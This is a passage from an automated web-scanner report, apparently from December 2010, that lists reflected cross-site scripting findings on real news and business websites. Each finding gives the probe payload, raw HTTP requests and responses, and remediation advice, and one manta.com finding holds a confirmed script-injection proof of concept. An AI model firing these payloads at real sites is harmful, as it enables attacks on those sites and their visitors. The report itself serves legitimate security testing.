This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724faf95'%3bc230f167291/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71720 Expires: Sun, 19 Dec 2010 03:09:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture/technology-gives-outdoor-adventure-company-edge/2132724faf95';c230f167291/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture;kw=technology-gives-outdoor-adventure-company-edge;kw=2132724faf95';c230f167291;kw=npo;kw=f ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d53'%3bfc81ba2dd04 was submitted in the REST URL parameter 6. This input was echoed as 80d53';fc81ba2dd04 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/80d53'%3bfc81ba2dd04 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38381
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4235e'%3b197e146723c was submitted in the REST URL parameter 1. This input was echoed as 4235e';197e146723c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business4235e'%3b197e146723c/best-cities/joint-venture/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69709 Expires: Sun, 19 Dec 2010 02:58:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business4235e';197e146723c/best-cities/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business4235e';197e146723c;kw=best-cities;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ec53'%3b451c5dd64b0 was submitted in the REST URL parameter 2. This input was echoed as 5ec53';451c5dd64b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities5ec53'%3b451c5dd64b0/joint-venture/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69673 Expires: Sun, 19 Dec 2010 02:58:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities5ec53';451c5dd64b0/joint-venture/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities5ec53';451c5dd64b0;kw=joint-venture;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTa ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b1e5'%3bf6daa34de79 was submitted in the REST URL parameter 3. This input was echoed as 5b1e5';f6daa34de79 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture5b1e5'%3bf6daa34de79/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69656 Expires: Sun, 19 Dec 2010 02:58:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/small-business/best-cities/joint-venture5b1e5';f6daa34de79/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=small-business;kw=best-cities;kw=joint-venture5b1e5';f6daa34de79;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=1252802 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3359'%3b930c56bb48d was submitted in the REST URL parameter 4. This input was echoed as e3359';930c56bb48d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-business/best-cities/joint-venture/e3359'%3b930c56bb48d HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43917
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1d5a'%3b751ceb65de was submitted in the REST URL parameter 1. This input was echoed as b1d5a';751ceb65de in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videob1d5a'%3b751ceb65de/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43056
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87fe6'%3bffef4397ad3 was submitted in the REST URL parameter 2. This input was echoed as 87fe6';ffef4397ad3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/87fe6'%3bffef4397ad3 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43111
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f018'%3bd9badb31fa was submitted in the REST URL parameter 1. This input was echoed as 2f018';d9badb31fa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides2f018'%3bd9badb31fa/holidays/ HTTP/1.1 Host: www.foodnetwork.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:16:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51622
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6cb'%3bef32a7e8c9e was submitted in the REST URL parameter 2. This input was echoed as cb6cb';ef32a7e8c9e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/holidayscb6cb'%3bef32a7e8c9e/ HTTP/1.1 Host: www.foodnetwork.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:16:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:16:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51616
1.313. http://www.manta.com/c/mtxl353/pla [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/c/mtxl353/pla
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bc18"><script>alert(1)</script>63c157158a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/mtxl353/pla?7bc18"><script>alert(1)</script>63c157158a=1 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae57c'%3b8725fae52c1 was submitted in the REST URL parameter 1. This input was echoed as ae57c';8725fae52c1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assetsae57c'%3b8725fae52c1/images/arrow-sort-down.gif HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:25:19 GMT Date: Sun, 19 Dec 2010 03:25:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47241
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0351'%3b825ccdc7209 was submitted in the REST URL parameter 2. This input was echoed as e0351';825ccdc7209 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/imagese0351'%3b825ccdc7209/arrow-sort-down.gif HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:25:29 GMT Date: Sun, 19 Dec 2010 03:25:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 46144
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad9a'%3b6c0973b62d9 was submitted in the REST URL parameter 1. This input was echoed as 4ad9a';6c0973b62d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets4ad9a'%3b6c0973b62d9/images/arrow-sort-up.gif HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:25:24 GMT Date: Sun, 19 Dec 2010 03:25:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47220
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 372a9'%3b21f0eea1f7a was submitted in the REST URL parameter 2. This input was echoed as 372a9';21f0eea1f7a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_assets/images372a9'%3b21f0eea1f7a/arrow-sort-up.gif HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:25:34 GMT Date: Sun, 19 Dec 2010 03:25:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49098
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 363ab'%3b32caacdfa00 was submitted in the REST URL parameter 2. This input was echoed as 363ab';32caacdfa00 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /case+million+Canadians/3938655363ab'%3b32caacdfa00/story.html HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 62494 Expires: Sun, 19 Dec 2010 03:26:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:26:04 GMT Connection: close Set-Cookie: ASP.NET_SessionId=rqxow5jv2qeac5jgl2lgryan; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/case-million-canadians/3938655363ab';32caacdfa00/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=case-million-canadians;kw=3938655363ab';32caacdfa00;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=27784504?"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18e89'%3b6ff09eac89f was submitted in the REST URL parameter 1. This input was echoed as 18e89';6ff09eac89f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css18e89'%3b6ff09eac89f/main.min.css HTTP/1.1 Host: www.nationalpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:53 GMT Date: Sun, 19 Dec 2010 03:03:53 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 48388
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76644'%3b9a5aecc8387 was submitted in the REST URL parameter 1. This input was echoed as 76644';9a5aecc8387 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homes76644'%3b9a5aecc8387/Helen+Morris+Illegal+renos+such+drag/3994453/story.html HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73097 Expires: Sun, 19 Dec 2010 03:24:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:24:58 GMT Connection: close Set-Cookie: ASP.NET_SessionId=yqqm4i551six2uyifcx4aaeb; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/homes76644';9a5aecc8387/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=homes76644';9a5aecc8387;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37716559?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b32ae'%3b4ebf56b551c was submitted in the REST URL parameter 3. This input was echoed as b32ae';4ebf56b551c in the application's response.
